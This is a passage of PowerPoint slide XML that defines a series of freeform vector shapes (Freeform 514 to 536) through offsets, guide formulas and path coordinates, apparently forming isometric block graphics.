                      <a:pt x="0" y="60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43" name="Freeform 514"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8697" y="-3518"/>
                <a:ext cx="2487" cy="1573"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2487"/>
                  <a:gd name="T1" fmla="*/ 562 h 1573"/>
                  <a:gd name="T2" fmla="*/ 2095 w 2487"/>
                  <a:gd name="T3" fmla="*/ 0 h 1573"/>
                  <a:gd name="T4" fmla="*/ 2487 w 2487"/>
                  <a:gd name="T5" fmla="*/ 1011 h 1573"/>
                  <a:gd name="T6" fmla="*/ 392 w 2487"/>
                  <a:gd name="T7" fmla="*/ 1573 h 1573"/>
                  <a:gd name="T8" fmla="*/ 0 w 2487"/>
                  <a:gd name="T9" fmla="*/ 562 h 1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7" h="1573">
                    <a:moveTo>
                      <a:pt x="0" y="562"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2095" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2487" y="1011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="1573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="562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chemeClr val="hlink"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="54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44" name="Freeform 515"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9030" y="-2491"/>
                <a:ext cx="2891" cy="948"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 652 w 2891"/>
                  <a:gd name="T1" fmla="*/ 948 h 948"/>
                  <a:gd name="T2" fmla="*/ 2891 w 2891"/>
                  <a:gd name="T3" fmla="*/ 348 h 948"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2891"/>
                  <a:gd name="T5" fmla="*/ 0 h 948"/>
                  <a:gd name="T6" fmla="*/ 0 w 2891"/>
                  <a:gd name="T7" fmla="*/ 600 h 948"/>
                  <a:gd name="T8" fmla="*/ 652 w 2891"/>
                  <a:gd name="T9" fmla="*/ 948 h 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91" h="948">
                    <a:moveTo>
                      <a:pt x="652" y="948"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2891" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="94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45" name="Freeform 516"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9682" y="-2143"/>
                <a:ext cx="2239" cy="2005"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 2005 h 2005"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 1405 h 2005"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 0 h 2005"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 600 h 2005"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 2005 h 20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39" h="2005">
                    <a:moveTo>
                      <a:pt x="0" y="2005"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="1405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="200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46" name="Freeform 517"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8009" y="-3736"/>
                <a:ext cx="2842" cy="763"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2842"/>
                  <a:gd name="T1" fmla="*/ 603 h 763"/>
                  <a:gd name="T2" fmla="*/ 2240 w 2842"/>
                  <a:gd name="T3" fmla="*/ 0 h 763"/>
                  <a:gd name="T4" fmla="*/ 2842 w 2842"/>
                  <a:gd name="T5" fmla="*/ 163 h 763"/>
                  <a:gd name="T6" fmla="*/ 603 w 2842"/>
                  <a:gd name="T7" fmla="*/ 763 h 763"/>
                  <a:gd name="T8" fmla="*/ 0 w 2842"/>
                  <a:gd name="T9" fmla="*/ 603 h 7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42" h="763">
                    <a:moveTo>
                      <a:pt x="0" y="603"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2240" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2842" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="603" y="763"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="603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47" name="Freeform 518"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="10050" y="-4451"/>
                <a:ext cx="624" cy="167"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 624"/>
                  <a:gd name="T1" fmla="*/ 122 h 167"/>
                  <a:gd name="T2" fmla="*/ 452 w 624"/>
                  <a:gd name="T3" fmla="*/ 0 h 167"/>
                  <a:gd name="T4" fmla="*/ 624 w 624"/>
                  <a:gd name="T5" fmla="*/ 47 h 167"/>
                  <a:gd name="T6" fmla="*/ 173 w 624"/>
                  <a:gd name="T7" fmla="*/ 167 h 167"/>
                  <a:gd name="T8" fmla="*/ 0 w 624"/>
                  <a:gd name="T9" fmla="*/ 122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4" h="167">
                    <a:moveTo>
                      <a:pt x="0" y="122"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="122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48" name="Freeform 519"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="10223" y="-4404"/>
                <a:ext cx="451" cy="288"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 451"/>
                  <a:gd name="T1" fmla="*/ 288 h 288"/>
                  <a:gd name="T2" fmla="*/ 0 w 451"/>
                  <a:gd name="T3" fmla="*/ 120 h 288"/>
                  <a:gd name="T4" fmla="*/ 451 w 451"/>
                  <a:gd name="T5" fmla="*/ 0 h 288"/>
                  <a:gd name="T6" fmla="*/ 451 w 451"/>
                  <a:gd name="T7" fmla="*/ 165 h 288"/>
                  <a:gd name="T8" fmla="*/ 0 w 451"/>
                  <a:gd name="T9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1" h="288">
                    <a:moveTo>
                      <a:pt x="0" y="288"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="288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49" name="Freeform 520"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="10050" y="-4329"/>
                <a:ext cx="173" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 173"/>
                  <a:gd name="T1" fmla="*/ 0 h 213"/>
                  <a:gd name="T2" fmla="*/ 0 w 173"/>
                  <a:gd name="T3" fmla="*/ 166 h 213"/>
                  <a:gd name="T4" fmla="*/ 173 w 173"/>
                  <a:gd name="T5" fmla="*/ 213 h 213"/>
                  <a:gd name="T6" fmla="*/ 173 w 173"/>
                  <a:gd name="T7" fmla="*/ 45 h 213"/>
                  <a:gd name="T8" fmla="*/ 0 w 173"/>
                  <a:gd name="T9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3" h="213">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="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50" name="Freeform 521"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9597" y="-4329"/>
                <a:ext cx="626" cy="168"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 626"/>
                  <a:gd name="T1" fmla="*/ 121 h 168"/>
                  <a:gd name="T2" fmla="*/ 453 w 626"/>
                  <a:gd name="T3" fmla="*/ 0 h 168"/>
                  <a:gd name="T4" fmla="*/ 626 w 626"/>
                  <a:gd name="T5" fmla="*/ 45 h 168"/>
                  <a:gd name="T6" fmla="*/ 172 w 626"/>
                  <a:gd name="T7" fmla="*/ 168 h 168"/>
                  <a:gd name="T8" fmla="*/ 0 w 626"/>
                  <a:gd name="T9" fmla="*/ 12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6" h="168">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="453" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="168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51" name="Freeform 522"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9769" y="-4284"/>
                <a:ext cx="454" cy="289"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 454"/>
                  <a:gd name="T1" fmla="*/ 289 h 289"/>
                  <a:gd name="T2" fmla="*/ 0 w 454"/>
                  <a:gd name="T3" fmla="*/ 123 h 289"/>
                  <a:gd name="T4" fmla="*/ 454 w 454"/>
                  <a:gd name="T5" fmla="*/ 0 h 289"/>
                  <a:gd name="T6" fmla="*/ 454 w 454"/>
                  <a:gd name="T7" fmla="*/ 168 h 289"/>
                  <a:gd name="T8" fmla="*/ 0 w 454"/>
                  <a:gd name="T9" fmla="*/ 289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4" h="289">
                    <a:moveTo>
                      <a:pt x="0" y="289"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="289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52" name="Freeform 523"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9597" y="-4208"/>
                <a:ext cx="172" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 172"/>
                  <a:gd name="T1" fmla="*/ 0 h 213"/>
                  <a:gd name="T2" fmla="*/ 0 w 172"/>
                  <a:gd name="T3" fmla="*/ 165 h 213"/>
                  <a:gd name="T4" fmla="*/ 172 w 172"/>
                  <a:gd name="T5" fmla="*/ 213 h 213"/>
                  <a:gd name="T6" fmla="*/ 172 w 172"/>
                  <a:gd name="T7" fmla="*/ 47 h 213"/>
                  <a:gd name="T8" fmla="*/ 0 w 172"/>
                  <a:gd name="T9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2" h="213">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="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53" name="Freeform 524"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9146" y="-4208"/>
                <a:ext cx="623" cy="168"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 623"/>
                  <a:gd name="T1" fmla="*/ 120 h 168"/>
                  <a:gd name="T2" fmla="*/ 451 w 623"/>
                  <a:gd name="T3" fmla="*/ 0 h 168"/>
                  <a:gd name="T4" fmla="*/ 623 w 623"/>
                  <a:gd name="T5" fmla="*/ 47 h 168"/>
                  <a:gd name="T6" fmla="*/ 170 w 623"/>
                  <a:gd name="T7" fmla="*/ 168 h 168"/>
                  <a:gd name="T8" fmla="*/ 0 w 623"/>
                  <a:gd name="T9" fmla="*/ 12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3" h="168">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="168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54" name="Freeform 525"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9316" y="-4161"/>
                <a:ext cx="453" cy="286"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 453"/>
                  <a:gd name="T1" fmla="*/ 286 h 286"/>
                  <a:gd name="T2" fmla="*/ 0 w 453"/>
                  <a:gd name="T3" fmla="*/ 121 h 286"/>
                  <a:gd name="T4" fmla="*/ 453 w 453"/>
                  <a:gd name="T5" fmla="*/ 0 h 286"/>
                  <a:gd name="T6" fmla="*/ 453 w 453"/>
                  <a:gd name="T7" fmla="*/ 166 h 286"/>
                  <a:gd name="T8" fmla="*/ 0 w 453"/>
                  <a:gd name="T9" fmla="*/ 28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3" h="286">
                    <a:moveTo>
                      <a:pt x="0" y="286"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="166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55" name="Freeform 526"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9146" y="-4088"/>
                <a:ext cx="170" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 170"/>
                  <a:gd name="T1" fmla="*/ 0 h 213"/>
                  <a:gd name="T2" fmla="*/ 0 w 170"/>
                  <a:gd name="T3" fmla="*/ 168 h 213"/>
                  <a:gd name="T4" fmla="*/ 170 w 170"/>
                  <a:gd name="T5" fmla="*/ 213 h 213"/>
                  <a:gd name="T6" fmla="*/ 170 w 170"/>
                  <a:gd name="T7" fmla="*/ 48 h 213"/>
                  <a:gd name="T8" fmla="*/ 0 w 170"/>
                  <a:gd name="T9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0" h="213">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="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56" name="Freeform 527"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8692" y="-4088"/>
                <a:ext cx="624" cy="168"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 624"/>
                  <a:gd name="T1" fmla="*/ 123 h 168"/>
                  <a:gd name="T2" fmla="*/ 454 w 624"/>
                  <a:gd name="T3" fmla="*/ 0 h 168"/>
                  <a:gd name="T4" fmla="*/ 624 w 624"/>
                  <a:gd name="T5" fmla="*/ 48 h 168"/>
                  <a:gd name="T6" fmla="*/ 173 w 624"/>
                  <a:gd name="T7" fmla="*/ 168 h 168"/>
                  <a:gd name="T8" fmla="*/ 0 w 624"/>
                  <a:gd name="T9" fmla="*/ 123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4" h="168">
                    <a:moveTo>
                      <a:pt x="0" y="123"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="454" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="168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57" name="Freeform 528"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8865" y="-4040"/>
                <a:ext cx="451" cy="288"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 451"/>
                  <a:gd name="T1" fmla="*/ 288 h 288"/>
                  <a:gd name="T2" fmla="*/ 0 w 451"/>
                  <a:gd name="T3" fmla="*/ 120 h 288"/>
                  <a:gd name="T4" fmla="*/ 451 w 451"/>
                  <a:gd name="T5" fmla="*/ 0 h 288"/>
                  <a:gd name="T6" fmla="*/ 451 w 451"/>
                  <a:gd name="T7" fmla="*/ 165 h 288"/>
                  <a:gd name="T8" fmla="*/ 0 w 451"/>
                  <a:gd name="T9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1" h="288">
                    <a:moveTo>
                      <a:pt x="0" y="288"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="288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58" name="Freeform 529"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8692" y="-3965"/>
                <a:ext cx="173" cy="213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 173"/>
                  <a:gd name="T1" fmla="*/ 0 h 213"/>
                  <a:gd name="T2" fmla="*/ 0 w 173"/>
                  <a:gd name="T3" fmla="*/ 166 h 213"/>
                  <a:gd name="T4" fmla="*/ 173 w 173"/>
                  <a:gd name="T5" fmla="*/ 213 h 213"/>
                  <a:gd name="T6" fmla="*/ 173 w 173"/>
                  <a:gd name="T7" fmla="*/ 45 h 213"/>
                  <a:gd name="T8" fmla="*/ 0 w 173"/>
                  <a:gd name="T9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3" h="213">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="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59" name="Freeform 530"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8239" y="-3965"/>
                <a:ext cx="626" cy="168"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 626"/>
                  <a:gd name="T1" fmla="*/ 121 h 168"/>
                  <a:gd name="T2" fmla="*/ 453 w 626"/>
                  <a:gd name="T3" fmla="*/ 0 h 168"/>
                  <a:gd name="T4" fmla="*/ 626 w 626"/>
                  <a:gd name="T5" fmla="*/ 45 h 168"/>
                  <a:gd name="T6" fmla="*/ 172 w 626"/>
                  <a:gd name="T7" fmla="*/ 168 h 168"/>
                  <a:gd name="T8" fmla="*/ 0 w 626"/>
                  <a:gd name="T9" fmla="*/ 12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6" h="168">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="453" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="168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60" name="Freeform 531"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8411" y="-3920"/>
                <a:ext cx="454" cy="288"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 454"/>
                  <a:gd name="T1" fmla="*/ 288 h 288"/>
                  <a:gd name="T2" fmla="*/ 0 w 454"/>
                  <a:gd name="T3" fmla="*/ 123 h 288"/>
                  <a:gd name="T4" fmla="*/ 454 w 454"/>
                  <a:gd name="T5" fmla="*/ 0 h 288"/>
                  <a:gd name="T6" fmla="*/ 454 w 454"/>
                  <a:gd name="T7" fmla="*/ 168 h 288"/>
                  <a:gd name="T8" fmla="*/ 0 w 454"/>
                  <a:gd name="T9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4" h="288">
                    <a:moveTo>
                      <a:pt x="0" y="288"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="288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61" name="Freeform 532"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8239" y="-3844"/>
                <a:ext cx="172" cy="212"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 172"/>
                  <a:gd name="T1" fmla="*/ 0 h 212"/>
                  <a:gd name="T2" fmla="*/ 0 w 172"/>
                  <a:gd name="T3" fmla="*/ 167 h 212"/>
                  <a:gd name="T4" fmla="*/ 172 w 172"/>
                  <a:gd name="T5" fmla="*/ 212 h 212"/>
                  <a:gd name="T6" fmla="*/ 172 w 172"/>
                  <a:gd name="T7" fmla="*/ 47 h 212"/>
                  <a:gd name="T8" fmla="*/ 0 w 172"/>
                  <a:gd name="T9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2" h="212">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="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62" name="Freeform 533"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="7787" y="-3844"/>
                <a:ext cx="624" cy="167"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 624"/>
                  <a:gd name="T1" fmla="*/ 123 h 167"/>
                  <a:gd name="T2" fmla="*/ 452 w 624"/>
                  <a:gd name="T3" fmla="*/ 0 h 167"/>
                  <a:gd name="T4" fmla="*/ 624 w 624"/>
                  <a:gd name="T5" fmla="*/ 47 h 167"/>
                  <a:gd name="T6" fmla="*/ 173 w 624"/>
                  <a:gd name="T7" fmla="*/ 167 h 167"/>
                  <a:gd name="T8" fmla="*/ 0 w 624"/>
                  <a:gd name="T9" fmla="*/ 123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4" h="167">
                    <a:moveTo>
                      <a:pt x="0" y="123"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="167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63" name="Freeform 534"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="7960" y="-3797"/>
                <a:ext cx="451" cy="288"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 451"/>
                  <a:gd name="T1" fmla="*/ 288 h 288"/>
                  <a:gd name="T2" fmla="*/ 0 w 451"/>
                  <a:gd name="T3" fmla="*/ 120 h 288"/>
                  <a:gd name="T4" fmla="*/ 451 w 451"/>
                  <a:gd name="T5" fmla="*/ 0 h 288"/>
                  <a:gd name="T6" fmla="*/ 451 w 451"/>
                  <a:gd name="T7" fmla="*/ 165 h 288"/>
                  <a:gd name="T8" fmla="*/ 0 w 451"/>
                  <a:gd name="T9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1" h="288">
                    <a:moveTo>
                      <a:pt x="0" y="288"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="288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64" name="Freeform 535"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="7787" y="-3721"/>
                <a:ext cx="173" cy="212"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 173"/>
                  <a:gd name="T1" fmla="*/ 0 h 212"/>
                  <a:gd name="T2" fmla="*/ 0 w 173"/>
                  <a:gd name="T3" fmla="*/ 165 h 212"/>
                  <a:gd name="T4" fmla="*/ 173 w 173"/>
                  <a:gd name="T5" fmla="*/ 212 h 212"/>
                  <a:gd name="T6" fmla="*/ 173 w 173"/>
                  <a:gd name="T7" fmla="*/ 44 h 212"/>
                  <a:gd name="T8" fmla="*/ 0 w 173"/>
                  <a:gd name="T9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3" h="212">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="4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65" name="Freeform 536"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8009" y="-3133"/>
                <a:ext cx="1673" cy="2995"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 708 w 708"/>
                  <a:gd name="T1" fmla="*/ 673 h 1268"/>
                  <a:gd name="T2" fmla="*/ 432 w 708"/>
                  <a:gd name="T3" fmla="*/ 526 h 1268"/>
                  <a:gd name="T4" fmla="*/ 255 w 708"/>
                  <a:gd name="T5" fmla="*/ 68 h 1268"/>
                  <a:gd name="T6" fmla="*/ 0 w 708"/>
                  <a:gd name="T7" fmla="*/ 0 h 1268"/>
                  <a:gd name="T8" fmla="*/ 0 w 708"/>
                  <a:gd name="T9" fmla="*/ 1078 h 1268"/>
                  <a:gd name="T10" fmla="*/ 105 w 708"/>
                  <a:gd name="T11" fmla="*/ 1106 h 1268"/>
                  <a:gd name="T12" fmla="*/ 162 w 708"/>
                  <a:gd name="T13" fmla="*/ 942 h 1268"/>
                  <a:gd name="T14" fmla="*/ 486 w 708"/>
                  <a:gd name="T15" fmla="*/ 1051 h 1268"/>
                  <a:gd name="T16" fmla="*/ 561 w 708"/>
                  <a:gd name="T17" fmla="*/ 1229 h 1268"/>
                  <a:gd name="T18" fmla="*/ 708 w 708"/>
                  <a:gd name="T19" fmla="*/ 1268 h 1268"/>
                  <a:gd name="T20" fmla="*/ 708 w 708"/>
                  <a:gd name="T21" fmla="*/ 673 h 1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08" h="1268">
                    <a:moveTo>
                      <a:pt x="708" y="673"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="432" y="526"/>
                      <a:pt x="432" y="526"/>
                      <a:pt x="432" y="526"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="255" y="68"/>
                      <a:pt x="255" y="68"/>
                      <a:pt x="255" y="6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078"/>
                      <a:pt x="0" y="1078"/>
